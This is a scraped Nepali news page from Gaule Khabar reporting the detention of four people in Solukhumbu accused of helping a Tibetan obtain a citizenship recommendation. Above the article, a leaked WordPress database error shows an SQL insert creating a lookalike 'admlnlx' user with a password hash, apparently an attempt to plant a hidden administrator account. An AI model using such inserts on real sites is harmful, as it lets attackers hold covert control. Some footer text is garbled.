WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.tu/RKYzTg7vAs/BjBFMNsZcfCEb2/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:17:23', '', 'admlnlx', 'admlnlx')

तिब्बतीयनलाई नागरिकता दिलाउन सहयोग गरेको आरोपमा सोलुका ४ पक्राउ – Gaule Khabar

तिब्बतीयनलाई नागरिकता दिलाउन सहयोग गरेको आरोपमा सोलुका ४ पक्राउ

तिब्बतीयनलाई नागरिकता दिलाउन सहयोग गरेको आरोपमा सोलुका ४ पक्राउ

सोलुखुम्बु । सोलुखुम्बुमा तिब्बतियन नागरिकलाई नागरिकता दिने प्रक्रियामा सहयोग गरेको आरोपमा ४ जनालाई प्रहरीले नियन्त्रणमा लिएको छ । जिल्ला प्रहरी कार्यालयको टोलीले सोलुदुधकुण्ड नगरपालिका २ बाट शुक्रबार उनीहरुलाई नियन्त्रणमा लिएको हो ।

जिल्ला प्रशासन कार्यालयमा नागरिकता बनाउन सिफारिस लिएर आएका ब्यक्तिमाथि कर्मचारीले शंका व्यक्त गरेपछि अनुसन्धान थालिएको थियो । सिफारिस लिने व्यक्ति तिब्बतीयन भएको खुलेपछि सिफारिस दिलाउने प्रक्रियामा सहयोग गरेको आरोपमा सोलु बेनीका ४ व्यक्तिलाई नियन्त्रणमा लिएर अनुसन्धान थालिएको छ ।

पक्राउ परेका व्यक्तिलाई म्याद थप गरेर अनुसन्धानको तयारी गरिएको छ । घटनाबारे विस्तृत जानकारी छानबिनपछिमात्र दिने प्रहरीले बताएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका